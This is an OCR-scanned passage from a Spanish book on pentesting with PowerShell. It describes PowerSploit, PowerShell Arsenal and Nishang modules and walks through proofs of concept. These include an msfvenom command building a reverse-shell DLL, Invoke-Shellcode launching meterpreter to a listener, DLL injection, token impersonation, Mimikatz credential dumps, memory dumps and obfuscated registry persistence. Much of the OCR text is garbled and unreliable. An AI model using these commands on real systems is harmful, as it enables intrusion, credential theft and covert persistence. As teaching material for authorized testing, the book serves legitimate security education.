Invoke-Token Manipulation 


Esta función crea un inicio de sesión con credenciales en texto 
plano y se puede inyectar en LSALogonUser, para posteriormente 
ser utilizado desde un /ogin de RDP o un login local 


Esta función copia un fichero desde un sistema NTFS mediante 
lectura del volumen en bruto y analizar sus estructuras 


Invoke-CredentialInjection 


Invoke-NinjaCopy 


Esta función carga Mimikatz 1.0 en memoria utilizando 
PowerShell. Esto puede ser utilizado para hacer un dumpeo de 
credenciales sin escribir nada en disco. En una fase de post- 
explotación puede permitir obtener información sensible de 
los usuarios, como por ejemplo sus contraseñas. La función es 

aplicable hasta Windows 8 


Invoke-Mimikatz 


; Esta función registra las pulsaciones realizadas por el usuario de la 
Get-Keystrokes s X 

i máquina sobre la ventana activa 
Esta función recupera contraseñas en texto plano y otra 
información de cuentas que fueron abiertas a través de las políticas 


de directivas de grupo 


Ger-GPPPassword 


Esta función realiza screenshots, siendo configurable el intervalo 
de actuación. Las capturas de pantalla realizadas se almacenan en 
una carpeta 


Enumera las rutas de los dispositivos de todos los volúmenes 
locales compatibles con shadow copies 


Get-TimedScreenshot 


O 3X hp  Qü1— 
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Mount- Monta un volumen en modo shadow copy 
VolumeShadowCopy 


Recupera las credenciales almacenadas en Vault Credential, el 
cual es un componente del sistema que almacena las credenciales 
introducidas en sitios web y credenciales de Windows 
Genera un minidump completo de memoria de un proceso 
proporcionado por el pentester. Esta función es útil para poder 
examinar lo que el proceso alberga en memoria 


Get-VauliCredential 


Out-Minidump 


Tabla 3.26: Funciones de Exfiltration en PowerSploit. 


Otros: Mayhem, Recon y AV Bypass 

Los módulos Mayhem, Recon y AV Bypass proporcionan funciones para recopilación de información, 
fingerprinting y evasión de antivirus. Se han agrupado en un solo apartado debido aque cada módulo 
contiene pocas funciones. A continuación se enumeran las distintas funciones disponibles. 


nan YA >si NNNM 


Localiza Single Byte AV utilizando el mismo método que DSplir desde 
"elass101 ". Esta función pertenece al módulo AV Bypass 
Esta función es una prueba de concepto que sobrescribe el Master 


Set-MasterBootRecord | Boot Record con el mensaje que el usuario indique. Este módulo per- 
tenece a Mayhem 


Find-AVSignature 


Esta función provoca un pantallazo azul en Windows. Este módulo 
pertenece a Mayhem 


n escáner de puertos básico. Interesante 
dulo pertenece al módu- 


Set-CriticalProcess 


Esta función proporciona u 
función para la fase de fingerprinting. Este mó 
lo Recon 


TTP y devuelve el código de estado y 
la dirección URL completa. Este módulo pertenece al módulo Recon. 
Un ejemplo sencillo de ejecución sería Get-HttpStatus —Target «do- 
o>. Esta ejecución comienza a hacer fuerza bruta de directorios y 
recursos y devuelve el código HTTP y la dirección URL 
Realiza un escaneo a los registros PTR. Este módulo pertenece al 
módulo Recon 


Invoke-Portscan 


Esta función realiza peticiones H 


Get-HTIPStatus 
mini 


Invoke-ReverseDns- 
Lookup 


Tabla 3.27: Diferentes funciones en PowerSploit. 


Además, el módulo Recon proporciona diccionarios que pueden ser utilizados para la fase x 
recopilación de información en un test de intrusión. Hay uno especial para Sharepoint. otro de u 


genérico y un tercero para la büsqueda de paneles de administración. 


T 
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PowerShell Arsenal: Disassembly 


Este módulo proporci i i 
d " b iidem funciones que permiten desensamblar código nativo y managed obteniend 
os. A continuación se enumeran las funciones correspondientes con el módulo: : 


Funei 
Get-CSDisassembly Esta función desensambla un binario devolviendo un arrav de bytes 


utilizando Capstone Engine disasse 
ed g. isassembly Framework 


Esta función desensambla de forma similar a como lo haría ildasm 
Tabla 3,28: Funciones de Disassembly en PowerShell Arsenal. 


PowerShell Arsenal: Malware Analysis 


H . . H " 
. l n ifi fi i P i 


módulo: 
| — Función ^ | Descripción 
New-FunctionDelegate Proporciona un Wrapper de un ejecutable para una función 


en x86 o x86 64 


prem Eu 
E e unction Crea un wrapper de una función exportada 
nvoke- ibrary 
| Invoke-LoadLibrary | e-LoadLibrary Carga una DLL en el actual proceso de PowerShell 


Get-HostsFile Parsea y devuelve el contenido del fichero hosts del sistema 


Windows 
New-HostsFileEntry 


Esta función permite reemplazar o añadir una entrada al 
fichero de hosts del sistema 

Esta función permite eliminar una entrada del fichero de 

hosts del sistema 


Remove-HostsFileEntry 


Esta función devuelve un output con todas las strings de un 

ejecutable .NET 

Esta función extrae todos los recursos managed de un 
ensamblado .NET 

Devuelve todos los métodos de un ensamblado que están 

implementados en MSIL 


Get-AssemblyStrings 


Get-AssemblyResources 


Get- 
AssemblvImplementedMethods 


Tabla 3.29: Funciones de Malware A nalysis en PowerShell Arsenal. 


PowerShell Arsenal: Memory Tools 


La inspe i y isi T. Tr y 
cción å i 


O |— — — ) |. — . . |. 3.J-- | 


Pentesting con PowerShell 


de l p ^ 
l owerSh ell Arsenal dispone de un m o denominado Me ) ols, e cual Im lementa los 
e i ódul 01 To 


siguientes tipos de funciones. 


Get-ProcessStrings 


Get-Virtual Memory Info 


Get-Process MemorvlInfo 


Descripción 


ytrings imprimibles 
Esta función devuelve como output todas las strings imprim 
de un proceso que se encuentra en memoria 


Esta función es un wrapper para kernel32! VirtualQueryEx 


ioi ió emoria 
Esta función proporciona al usuario información al — 
virtual para cada conjunto de páginas que se — xe 
memoria. Esta función es similar a /vadump Wi - - 
inistrado de 
Esta función proporciona datos de un bloque no administ a 
la memoria en un proceso arbitrario 


Get-StructFromMemory 


er. senal. 
Tabla 3.30: Funciones de Memory Tools en Power Shell Arsena 


PowerShell Arsenal: Parsers 


ue 5 
Este módulo presenta funciones que —À 
en memoria o los conocidos como file formats. 
describen a continuación. 


a posibilidad de realizar parseos sobre ejecutables 
El módulo consta de 4 funciones, las cuales se 


TN Arenal: 
Tabla 3.31: Funciones de Parsers en Power Shell Arsena 


Find-ProcessPEs 


i als 
al: Windows Intern Ñ o - 
Mesi srt nciones que ayudan a obtener información a bajo nivel del sistema 


— Ln dulo son presentadas a continuación. 


operativo. Las funciones que conforman este mó 


Descripción 


Devuelve el PEB de un procesos, es decir, el Process 
midi Environment Block 


i t ódulos cargados 
Register-Process ModuleTrace Registra una traza de m 


Ó en los 
Muestra información sobre los módulos cargados 
procesos 
Z 


Detiene la traza de módulos cargados 


Get-Process ModuleTrace 


Unregister-Process ModuleTrace 


El escenario de esta prueba de conce 
fase de post-exploitation. 


En primer lugar se utilizarán las funciones /nvoke-Portscan y Get 
información sobre una máquina remota. Esta máquina remota tendrá u 
abiertos y servicios corriendo en ella. El pentester utilizará estas funci 
un mapa de puertos y servicios, y por otro lado utilizará la segunda fun 
recursos HTTP y el estado que se devuelve de éstos. 


La función /nvoke- 
flexible de dicha 
interesantes y las 


KM 
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Descripción 


Esta función es un wrapper de kernel32!GetSysteminfo 


Tabla 3.32: Funciones de Windows Internals en PowerShell A rsenul. 


PowerShell Arsenal: Misc 


Este módulo proporciona funciones con diferentes o 
escenarios. Por encima del resto destaca la fam 
de Sysinternals. A continuación se describen la 


Get-Member 


ConvertTo-String 


Get-Entropy 


bjetivos, pero que pueden ser ütiles en diferentes 
osa Get-Strings, la cual es una réplica de strings.exe 
s diferentes funciones que forman parte de Misc. 


Descripción 


Dumpea las strings de un fichero en formato Unicode o Ascii, Es una réplica 
de la funcionalidad de Sysinternals Strings.exe 


Esta función extiende el cmdlet Get-Member, la cual añade el parámetro 
Private, el cual permite mostrar members no públicos de NET 


Convierte los bytes de un fichero a string 


Calcula la entropía de un fichero o un array de bytes 


Tabla 3.33; Funciones de Misc en PowerShell Arsenal 


PoC: Code Execution + Recon 


En esta prueba de concepto se va a trabajar con los módulos Code Execution y Recon de Pow 


pto contempla la fase de reconocimiento y fingerprir 


'erSploit. 
Ming y la 


-HttpStatus para obtener 
n gran nümero de puertos 
ones con el fin de obtener 
ción con el fin de encontrar 


Portscan dispone de una serie de parámetros, los cuales ofrecen una funcionalidad 


función. A continuación se presenta un cuadro resumen de los parámetros más 
posibilidades de descubrimiento que ofrece la función. 


Permite indicar diferentes hosts en la línea de coman 
comas. Este parámetro soporta IPv4 CIDR, por lo qu 
redes, por ejemplo 80.0.0.0/24 


Parámetro 


dos separados por 
e se pueden indicar 


Pentesting con rowe rshell 


Descripción 


Parámetro 


Permite indicar un fichero con los hosís a escanear 


Permite excluir hosts separados por coma 


Permite indicar los puertos que se quieren escanear separados por comas 


También se permite indicar un rango de puertos, por ejemplo 20-500 


Se indican los puertos desde un fichero de texto 


Permite indicar el número de Top Ports que se quieren escanear. Por 


defecto es 50 


Permite excluir los puertos indicados en este parámetro 


Deshabilita el escaneo de puertos y realiza un escaneo a través del proto- 


colo ICMP 


Devuelve en XML el descubrimiento realizado 


PingOnly 


Devuelve los resultados en ficheros con diferentes formatos como son 


AllformatsOut > 
.nmap, -xmi y .gnmap 


Tabla 3.34: Parámetros de Invoke-Portscan 


Con la información anterior se puede entender que la función dispone de diferentes opciones, 
entendiendo esta función como bastante flexible. Además, el poder utilizar esta información en otras 
herramientas es un punto a su favor, gracias a la exportación a ficheros XML y otros formatos, como 
por ejemplo nmap. 


"Invoke-Portscan.psi v8.13 scan initiated U = Invoke-Po 
Port Scanning 
[00000000000000000000000000000 1 


starting computer 121 


PS D:NlibrosNpentesting povershellNPoverSploit-masterwRecon? Invoke-Portsca 
n -Hosts 192.168.56.0/24 -PingOnly ! Mhere-Object 4$ .alive -eq $true> 


Hostnane 192.168 .56-1081 


filteredPorts 
finishTime 


<> 

08/08/2015 15:43:39 
Hostname 192.168.56.182 
alive 
openPorts 
closedPorts 
filteredPorts 
finishTine 


<> 
68/08/2815 15:43:39 


192.168.56.255 
True 


<> 

«4435 

O 

68/08/2015 15:43:39 


Fig. 3.37: Descubrimiento de máquinas en una red a través de 


openPorts 
closedPorts 


ICMP. 


NEN rerrr88.8.1!Á1!1. 00000000 
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n la Imagen se ) 
la imagen se pued j ali ! I 
rag I lede visualizar como se escane: |: le ) ( 4 
v por dar az ing. anea la red 192 ] 18.56 0/ 
' [ usca de maquinas qu 


A 1ás, | SO c £ ( 10) 7 ) -F son t 
den 1 os objetos >] > or la 7 
los J V S] é func 14. VOK€ Ports an Í ltr 
| on idc a d ] zing >I esta restric n ; * ra s 
que han res d cno i l 
to los OS yt E / ng S 1 siriccion nc | ubie 
tÜC OS C JE OS gene ados. uno pol cada Htc 
IST 


ados para 
ido configurada se mostraríai 
Ahora se utilizará la función /nvoke 
maquina en concreto, en este caso la 1 

o z EA * : g 
y isualizar en la imagen, la máquin 
caminos al pente: 


-Portscan para llevar a cabo un es 
J SC 


máquina con dirección IP 192,168.56 
nien à tiene un gran número de puertos bet 
que deben ser evaluados en la fase 


IPS D:NIibrosN i 
d pentest Jers 
Hosts 192.168.56.182 Panes 


10 


abiertos, lo cu 


al abre diferente 
de explotación. — 


hellNPouerSploit 


es 20-509 —naster*NRecon? Invoke 


Por 


192.168 .56.182 
X 

21227 53-95. x 
€20. 24 892 52A 
e 27229:090 223 


IF inishTime 88/08/2015 15:52:58 


PS D:NlibrosN i 
ES E S'Npentestin Jers 
Portscan -Hosts 192.168 te 1u 1p 


openPorts 
losedPorts 
FilteredPorts 


PowerSploit-mas 
orts 28-588 


sting pouershellNPouerSploit-mas 


terNRecon? $ports = Invok 


terNRecon» $ports.openPo 


Fig. 3.38 » imi 
g. 3.3 Descubrimienta de puertos ab 
ab 


terti 
tertos con Invoke-Portscan 


Para finalizar cc s funci 

ei 'alizar con las funciones de Recon y viendo ]u 
abierto se de utiliz n i pos anto 
¿ | se puede utilizar la función Ger-HttpStatus à 
cua > > cor 1 i 
uales se describen a continuación. 


a máquina 192.168.56.102 tien 


iin; apod e el puerto 80 
Esta función dispone d | | 


e algunos parámetros, los 


Descripción 


Esq 'Cifica I: ireooión ^ ^ 

spe ca la dire cción c c T C1 270 C i 
W b aey 

O dirección IP d | host emoti 


Especifica el ost remoto 


se debe conectar 


F ste para jetre S JO Switch C Si se a« S ¿ 
I )€ de a O S e 
itc po lo qu 
1 in li :a Se ut y p 
N izar una 


conexión SSL 


Tabla 3.35; Pará ! 
la 3.35: Parámetros de Get-HttpStatus 


que solo se muestre! 


aneo de puertos con una 


n Te ! (v 
2. Tal y como se puede 


Ic 


1 


O ÁX A eÀ 3 . 
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ES — 


En el siguiente ejemplo se va a realizar un 
192.168.56.102. En esta büsqueda se va à filtrar por € 
' serán las mostradas, ¿Cuál es el objetivo 


recursos sobre el servidor web de la máquina 


a búsqueda de 
las respuestas obtenidas con 


ódigo, es decir, 
código “20*” 9 Poder conocer qué recursos existe en el 
servidor y se tiene acceso sobre ellos. 

sterNRecon? Get-HttpStatus 


sting pouershellNPouerSploit- ma 
Ndiccionario.txt i Where-Object 4$ ..Status — 


PS D:XlibrosNpente 
-Target 192.168-56.182 -Path . 


eq “OK” 
Status URL 


Fig. 3.39: Obtención de direcciones URL de un servidor. 


URL y ver el estado que devuelve con la 


com -Path «diccionario para fuzzear> 
bject puede ser sustituida por 


guir el listado de direcciones 
Target www.example 
La instrucción Select-0 
el desarrollo del libro. 


En resumen, se puede conse 
siguiente instrucción Get-HttpStatus - 
| Select-Object (where Statust ‘ode -eq 20*]. 
Where-Object, la cual se ha utilizado más durante 
án utilizadas ya en la fase de post-exploitation, aunque si se 
isuario sin privilegio se podrían utiliza: 
ro por lo general se utilizarán una 


Las funciones de Code Execution ser 
a un equipo o una sesión remota como unt 


tiene acceso fisico 
ceso, e incluso persistencia en el equipo, 


también para ganar ac pe 


vez que la explotación haya funcionado. 


son /nvoke-Shellcode, Invoke- 


an en esta prueba de concepto 
similares. La diferencia 


Las dos primeras funciones son 
a no utiliza llamadas a funciones 


A continuación se 


Las funciones que se present 
ShellcodeMSIL e Invoke-DilInjection. 
entre /nvoke-Shellcode e Invoke-ShellcodeMSIL es que la segund 
. lo cual puede ser aprov echado para evitar un comportamiento sospechoso. 


Win32 
tros de las funciones /nvoke Shellcode. 


detallan los paráme 


Descripción 


Se puede indicar el ID del proceso dónde inyectar la shellcode 


à à; Se puede especificar un arrav de bytes para ejecutar una shell- 
Shellcode s 1 " 

code 
Solo se dispone, 
hup y windows 


Se puede especificar qué payload utilizar. 


ayload actualmente, de windows/meterpreter/reverse 
meterpreter. reverse https 


Lista todos los pavloads soportados de Metasploit 


ombre de host dónde se recibirá 
rsos. en este parámetro el 
ón IP suya para recibir 


ListMetasploitPayloads 
Indica cual es la dirección IP o n 

la conexión. Si los payloads son inve 
pentester siempre configurará una direcci 
la conexión 


Lhost 


A 6ÉZ 
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li 5 
a en q pue ( aid la me qu 
dica e puert ) escuchar 1la mà in 


. recibir la conexión 
Se puede indicar que 1 


a del pentester para 


se y 2. ih 
serAgent utilizar cuando sel 


Meterpreter a través de HTTP o a anza un 


SS UI i í as etl Z 
I arar [0] tipo SN vitch, C | cua indica | Se u 
I 1 parametr JE t li 


ler para M 
Meterpreter desconti a 
preter descontinuado o Sb nine a un hand 
s 'ae 


Especifica si se utilizará un P, E | modemo 
" OXY. Es un r4 R 
por lo que si se activ Y. ES un parámetro tipo s 
: ja sec "n SN 
activa se cogerán los valores pa nnam - 
E - &urados en k 
maquina como proxy os en la 


Tabla 3.36 Parámetre te Invoke-Sh ? 
abit 20: Farametros de Invoke Shelle de 


hora, el pent f € cre 
A , €i pentester puede crear roces 
'jecutar esto ade de crear un proceso oculto, por ejemplo un not 1 
j Sto:es | k Pignsss nodn E a otepad.exe. | 
v e HI pad.exe —-WindowSty 7 o 
OW) le hidden 


-à instrucción para 


Para poder re 
E er recuperar el identifi 
t entificador de proce 
O Tem ra n de proceso se puede ejecutar Get-Proc Á 
i , ará la shellcode inve "^ à J = OCess o tasklist en cuz 
Ve to. tHst en cualquie 
y a sobre el ia 


oculto y corrienc : ; 
rd » > = ) "e x 

endo en el sistema. proceso notepad.exe que se encuentra 

* -MCUCDIUTZ 


P. - var cal TE g 
arg evar a cabo esta z c U C 1 [: [4 ME / 
à acción se ejec Ita la s guiente si 
Jec la 4 instrucción tasklist X fu Ist 2 ] 
€ mas Í 
ud. ex 


In OKE -Shell 'Ode -Favivad don é rprete Fé y IS - 9 -Lport 844 
di Par jad w 1 WS/n er, 2 VO. 0? 
; Hie : ; p ad Hi la Ss/metc $ ter erse hiig 5 Lii t / 16 
| OS L. 8 6 101 i 
. . pori y ) 


Fig. 40: Obtei j e SES "lerpreter con reverse 
: Ob tención de se sión de Mete Fpreter con erse 
3 TyVPFQO 


https 
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ar una DLL en 


pentesting 


S *NlihbrosNpentestin povershe overSploit-masterxExf tr. 
D h Npentesting [ rs) 
IBES pl NE: 
s iltr 


Por último, es importante hablar de Invoke-Dl Injection. Esta función permite inyect 
ation» 
n? Invo e-TokenManipulation —Enumer 


un proceso existente en la máquina utilizando su PID. Una DLL puede ser fácilmente inyectable en 
— Domain 
un proceso. emain INT AUTHOR 
sername ITY 
: SYSTEM 
ani j i ; $ à LogonT ype : 2864 
La ünica desventaja es que la DLL debe ser escrita en disco. lo cual puede hacer que sea detectada IsEleuated zd 
3 e : True 
por los motores de antivirus. o : Primary 
riuilegesEnabled = {S 
: 1^ a ee "i "^c " ^ Š "ic riuileges - Soeur cnepLokenPEiuilege, SeLockMenoryPrioi 
A continuación se muestran los diferentes parámetros que proporciona esta función. egesAvailable : (SessignPrimaryTokenPrdoilo oryPrivilege, SeTcbPrivil 
Process 1d Ses SCUUSTCUPEAO i1 okenPrivilege. Selncreas ege, 
: 692 ege. SeTakeOunershi saseQuotaPrivile 
shipPrivilege...> ege, 


Domai 
: rin = NT AUTHORITY 
: SERUICIO LOCAL 
ogonType : Sn 
sElevated : - 


Prinary 


Se puede indicar el ID del proceso dónde inyectar la DLL 
hangeNotifyPrivilege 


vailable qnPri 


Ruta dónde se encuentra la DLL que será inyectada en el proceso. La 
SeInpersone ER 

ryTokenPriviles 2: esonatePrivilege, 

vilege, DUE CERE Ped qe d 


ruta puede ser absoluta o relativa 


SeCreat iui 
env lege) 


Tabla 3,37: Parámetros de Invoke-Dllinjection 
Dablo-Gonzalez 


¿Cómo generar una DLL maliciosa de manera sencilla? Hay que tener en cuenta que este método 
puede se! detectado por gran cantidad de antivirus, pero existen otras formas para lograr la evasión. : Primary 
i * {SeChangeNotifyPrivi 
a E . ailizará la herramienta msfve 4 framework de Metasploit. Le (SeIncreas yPrivilege, Selmpers EA 
la DLL se utilizará la herramienta msfvenom del framework de Metasploit. La E rossId o tecla Selebbrivilone. Cabo SeCreateGlobalPrivilege) 
E ad ACT. A P E y > SeSe "i us o E " 
> windows/x64/meterpreter/reverse Tcp LHOST=<dirección 1P gops sge- -2 curityPrivilege, s 


] handler? -f dll malicioso.dll. 


Para generat 
instrucción sería msfvenom —] 
pentester> LPORT-«puerto por el que escuchará € 


Fig. 3.41: El ) 
m7 — otok 
umeración de tokens en el sistema. 


Si el pentester qui j 
?r quiere ejecutar 'Oces 
Jecutar un proceso con una identidad concreta podrá util 
E a podrá utiliz 


3 como se h zo an JOTT > 
: to comc ] anteriorme te px In oke-Token Manipulation Cre rro by 
X } Featerrocess 


Una vez se tiene generada la DLL se puede crear un proceso 
ss notepad.exe WindowStyle Hidden. ar la instrucción 
ón Invoke-DilInjection ProcessID «numero 


ar el handler de Metasploit 


proce r ejempl 
proceso, por ejemplo calc.exe> 


Posteriormente, se puede inyectar la xtd 
ario, por ejemplo “nt authoritylsystem " 


ejemplo con Start-Proce. 
DLL en el proceso generado con la siguiente instrucci Username «domai, 
de PID> -Dii «ruta de la DLL». En el otro extremo hay que configur 


para recibir la conexión, como se ha visto en otros ejemplos. 


Pe otc le ; puede 1D Zar € JTOCCS 1Ciu 1 £ SIE 
y 1d0, se 
- C pe SC al al lr 0 ual nzar 
€ £ O la SIgL 


Token Mani ) ; 
y "pulat cA T 6 
7 ion -ImpersonateUser -Username “nt authori guiente instrucción /nvoke 
M nt authority system " " A 
Y wySTEn 


l cion Invoke-TokenA anıpu t € 
/ Tar ipulatio € l rse ( 1 CJE 
D 7 puc junta 


on + Persistence para extraer información sensible de /sa 
z > GsS.exe 


PoC: Post-Exploitation con Exfiltrati — PP 
ones de los módulos Exfiltration y iii 
es Invoke-Token Manipulation, 


Persistence. Respecto 


La funció 
ics : t ión Invoke-Mimikat= nli 
Invoke-Mimikatz, Get- ke-Mimikatz permite cargar en memoria Mimik 
a Mimikatz 


En esta prueba de concepto se estudian funci 
al módulo Exfiltration se tratarán las funcion 
Además, se puede ejecutar 


Time {Si 7X enshot V Qut- Minidum] | ] « | 
> juinas siem 
: as, pre y c : i i 
, pi "e c O Se nga e p V gio suncie a trav | 
I aves uc pi ime ) 


un dumpeo de cr T 
e credenciales s consiguien 

ales sin tener que escribir ijas siguiendo, por eje ; 

cribir un binar : | ejemplo, 

3 ario en disco. 


La primera función va a permitir al pentester impersonalizar los usuarios que hay en el sistema, 


también pudiendo enumerar 4 éstos. 


L 


e € ara d c cla es ULada d / 
iza un umpe O ac reder ues S s InVOC ida cone j; iramet Dump 
1 funció n rea arametro L unm 
pc eds, 


también 1 
puede realizar u 
ar un dumpe 0 de certificados de la máquina aunque 


lograr listar los tokens 
a con el parámetro DumpCerts 


Enumerate se puede 


Mediante el uso de invoke-TokenManipulation 
la máquina y que éste ejecute con 


el sistema. También se podrá crear un proceso en Si el pentester requi l 
l ' ere lanzar la funció 
a Te lanzar la función sobre v 
v ce Name de la siguiente forma ComputerN 
Mimikatz tiene s i e 
alz tiene sus propios comandos, por 


funció i 
on, por ejemplo /nvoke-Mimikatz 


disponibles en 
otra identidad. 


jarias máquinas ili 

> Varias máquinas puede utilizar el parámetro 
ame "equi pes j ; 

: e (Q("equipol ", “equipo?” "equipoN " 
) que pueden ser ejec is à 
e | L ueden ser ejecutados también a través de l: 
.ommand "privilege::debug exit” o 


Para poder enumerar tokens y utilizarlos se deberá ejecutar como administrador la sesión de 


PowerShell. 


À 
EEE 


Pentesting con PowerShell 


A UT 


Authentication Id Ø ; 64899 (0BBBBBBB : BBBLBLAB3> 


Interactive from 1 
Administrator 


pshe118 
DS 6 5-21-3507275698-1183418431-608800615-500 


Session 


nsu £ 
[8000008031 Primary 
* Username : Administrator 


* Domain pshe118 
* LM 8235172c3a77d2c65aacd84cd494324f 


x NTLM 2015aa2627698da1100e50d3£2937£ 18 
* SHfii 354417c72665da7483738c65d8dce7b3f 1cbe274 
tspkg * 
* Username Administrator 
* Domain pshe118 
* Passuord 123abc.. 
udigest * 
* Username Administrator 
* Domain pshe118 
x Password 123abc.. 
livessp * 
kerberos : 
* Username Administrator 
* Domain : pshe118 
* Password : 123abc.. 


ec 2 
ss - 


credman = 


Fig. 3.42: Dumpeo de credenciales con Mimikatz. 


diar la función Get TimedScreenshot. 


Mimikatz se vaa estu 
La función puede ser 


antalla a través de PowerShell. 
ar un proceso oculto que 


Tras ver todo el potencial que ofrece Invoke 


Esta función permite obtener capturas de p 


utilizar para llevar a cabo capturas en remoto, aunque también se podria dej 


realice esta operación en un equipo con acceso fisico. 


La función permite recolectar screenshois en un intervalo de tiempo regular y almacenarlos en 
axis es sencilla Get-TimedScreenshot -Path «directorio dónde almacenar capturas> 

- -EndTime «hora a la que se debería dejar de realizar 
-Interval 60 —EndTime 20:00. 


disco. La sint 
Interval «tiempo en segundos entre capturas? 


. Por ejemplo, Get-TimedScreenshot —Path c:|pruebas 


capturas 


Por ültimo, queda la función Out-Minidump con la que el pentester puede realizar un volcado de 
a disco. Esta función se equipara a la aplicación procdump.exe La función 
DumpFilePath. El primer parámetro indica el 
El segundo parámetro indica en que 


memoria de un proceso 
n par de parámetros como son Process y 


presenta u 
volcar, y se obtendrá con Get-Process. 


proceso que se quiere 


ruta se almacenará el volcado. 


esting pouershell» Get-Process notepad 
PMK? WSK) UMCM> CPUCs Id 


PS D:vlibrosspent 
Handles NPMCK>) 
7 5576 A 4,88 3888 notepad 
PS D:MlibrosNpentesting powers Out-Minidunp -punpFilePath C:VUs 
lez*Desktop*dunp 
Directorio: C:NlUsersNpgonzalezwNDesktopNdump 


hell» Get-Process notepad | erspgonza 


Mode LastWriteline Length Name 


-a—— 15/08/2815 1:26 62662993 notepad_3888 .dmp 


PS D:inlibrosspentesting pove rshel1l> 
Fig. 3.43: Obtención de un volcado de me 


^moria de un proceso. 


E Daily 


C. ^ule f C; 
—-apitulo 11] PowerShell puro El rig / [i y 
/ a art del p entesting 
e 


— NE 


i a función ( 

z l é 1 Get-Stringes que 

C Wen la imagen se puede visuali 

Pert. at vh iii a escrito un texto que cont si 

se estuviera almacenando e i 

su rr ei en un fichero de tex ) 
olcados de memoria puede provocar que infi pde 

orm 


v no ectá Y > 1 D 1 
y no está protegida quede a la vista del pentester 


Una ni 

na vez obtenido el volcado de memori 
tiene unción idénti 

ene una función idéntica a la herrami 
el notepad que ha sido volcado se h 


à se puede tratar por ejempl 
enta strings.exe. i i 


o con Í 


-— ar como en 
enfa la nat; 
tía la palabra pass. Podría ser un 


sto se quiere 
O Sé quiere mostrar que el 


ación que se enc 
jue se encuentra en memoria RAM 


NUsersXpgon 

s zalez S 

aped g lezNDesktopNdump?s 
passuord: 

passwuo 

passuor 123abc. 

password: 123abc. 


trings notepad 


i findstr pass 


Fig. 3.44. Visualizació 
g. 3.44. Visualizac Te / 
ualización del volcado de me 


"moria. 


En j "FSI, 
el módulo Persistente se tratar 


: án 2 funciones. c 
Fersisteise. T. 1 2 funciones, como son New-UserPe 


a primera funci ie 
a un script 2d era función configura las opciones con las qu 
t , para que posterior ws S as que 
€ E rmente la funció ; z 
UserPersistenret a función Add-Per xus 
ersistenceOption presenta los siguientes p — 


rsistenceOption y Add 
se aúulere ^ E 
se quiere dotar de persistencia 


la añad: imei 
lies anada. La rs 
arametros: a función New- 


Parámetro 
Descripción 


Sche. el Tiro te La vit * persis i A 
ScheduledTask a vía de persistencia será a través de una tarea p 
x 1a tarea programada. Es un 
I- qua. r£ in 


parametro de tipo switch 


La vía de persistenci: ; 
ni persistencia será a través del registro. La ruta dónd 
g acenará e i dii Y ` 4 on E )nde se 
enará es /7K Cl SOFTWARE Microsoft Wind. dón € 
2. HTCIOWNS AC. 


Re IIS tr) 


trrent Version 


) 
H * 015 a : 
Run. Es un parámetro de tipo switch 


El avioad £ ente é C 
pa acd co 1enz2 C at S I 1 letre 
nenzara Mame I ) Y ) 


e tipo switc/ 


El payload arrancará oe jec ta "à i 
E jecutara en un tiempo Spe cific ) Se lel is 
1 e S 0. >e debe 


, " “qa ^ 
SI ecificar en un for ato c ( 2:54 
c ja 1ató como l AM’ r 
1 rm / ; | AM’ 2:00: 
" 2:00:00' o0 * 22:02 
$ - 
Onldl 4 28 avoa { sera ejec c despues de l É 1 
J utado pi "S de ni i o de inac ivi ] C | | 
€ üt 11 la 


Para esta pr 

esta prueba de concepto se utilizará un 

que el payload se ejecute en cad 
1 é 

que des iss sará / 

: e después se pasará a Add-Persistence. L 

New-UserPersistenceOption —Reg 


Una ve; se ti 

. vez que se tienen las opciones 
^ de Add-Persistence. 
»criptBlock «comandos? 


máquina. El pará 
aquina. El parámetro es de tipo switch 
I 31 y 


a” El payload se ejecutará cu: 
— vioaa se ejecutará cuando un usuario inicie sesión. El | 
sesión. El parámetro es í 


tipo switch 


tabla 3.38: P. 
a.3.38: Parámetros de L 
o. Parámetros de la finción Neu 


a vía de persistencia como es el 


da inicio de sesión. E à se indicar: 
sesión. Estas opcio SRN ERNS 
an. S nes se alma n: uL a 
€ acenaran en una * 71 
en una variable 
ciones 


a instrucción par: 
s ara generar las opciones s 
gistry —AtLogon. | igi sed M 


^0) 3 re € rs 
configuradas y almacenadas en una variable 


Como ejemplo se presenta | se puede hacer 


a siguiente instrucción Add-Persisten 
CPSISIence 


-Ele ate ? j - y E 
€ istenc t 
l AF ers 1CC Option SElevatedOptions L seri ersistene eOpt ( 
10H 
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it-EncodedCommand | Out-File AEncodedPersistentScript. 
rmite indicar cuales son las opciones si se tienen 
istenceOption es la que genera dichas opciones, de 


$Opciones -Verbose -Pass Thru | Ot 
psl. El parámetro ElevatedPersistenceOption pe 
permisos elevados. La función New-ElevatedPers 
forma similar a como lo hace New-UserPersistenceOption. 


Esta es una manera sencilla de dotar de persistencia a los sc? 
la posibilidad de tener permisos de usuario O permisos más e 
de generar persistencia a scripts utilizando el ScriptBlock c 
Además, el uso de Out-EncodedCommand permite obtener 


contenido para que no sea tan visible. 


"ipis ante diversas condiciones, como es 
levados. Una manera sencilla y cómoda 
omo piedra para crear el contenido. 
un EncodedCommand que ofusca el 


6. Nishang 


Nishang es un frame 
de funcionalidades que pue 
intrusión. Nishang habilita el uso de p 
test de intrusión contemplando diferentes 
de herramientas que pueden ser utilizados para la post- 
puede descargar Nishang es hitps:/fgithub.com/samratashok/nishang. 


uesto por diferentes módulos que forman el framew 


Shell, el cual proporciona una serie 
r durante el desarrollo de un test de 
ayloads y de los scripts de PowerShell para un test ofensivo o 


fases de éste. En líneas generales, es Un potente conjunto 
explotación. La dirección URL dónde se 


work o colección de scripts de Power 
den ser utilizadas por un penfeste 


Nishang está comp ork global. Los diferentes 
módulos son descritos a continuación: 


- Antak - Webshell. Este módulo proporciona la posibilidad de utilizar una webshell que 
descarga y sube archivos, ejecuta comandos y ejecuta scripts de PowerShell en la memoria 


de la máquina. 
- Backdoors. Este módulo proporciona diferentes funciones que instalan una backdoor. 


Se utilizan diferentes protocolos y mecanismos para instalar backdoors en el sistema y que 
puedan ejecutar instrucciones a través de ellos. 


- Client. Crea archivos en diferentes formatos, 
inyecta instrucciones de PowerShell. Este módulo es intere 
usuario y el archivo malicioso que ejecuta instrucciones. 


- Escalation. Este módulo proporciona 2 funciones que ayu 


privilegios en el sistema comprometido. 


Execution. Este módulo proporciona funciones que ayudan al pentester a descargarse 
olo DNS, o desde un servidor web, y lo ejecuta a 


tilizados para conseguir la ejecución de código son 


como pueden ser Word, Excel, JAR, y les 
sante para utilizar la vía del 


dan a conseguir elevación de 


código, por ejemplo a través del protoc 
través de PowerShell. Los mecanismos u 


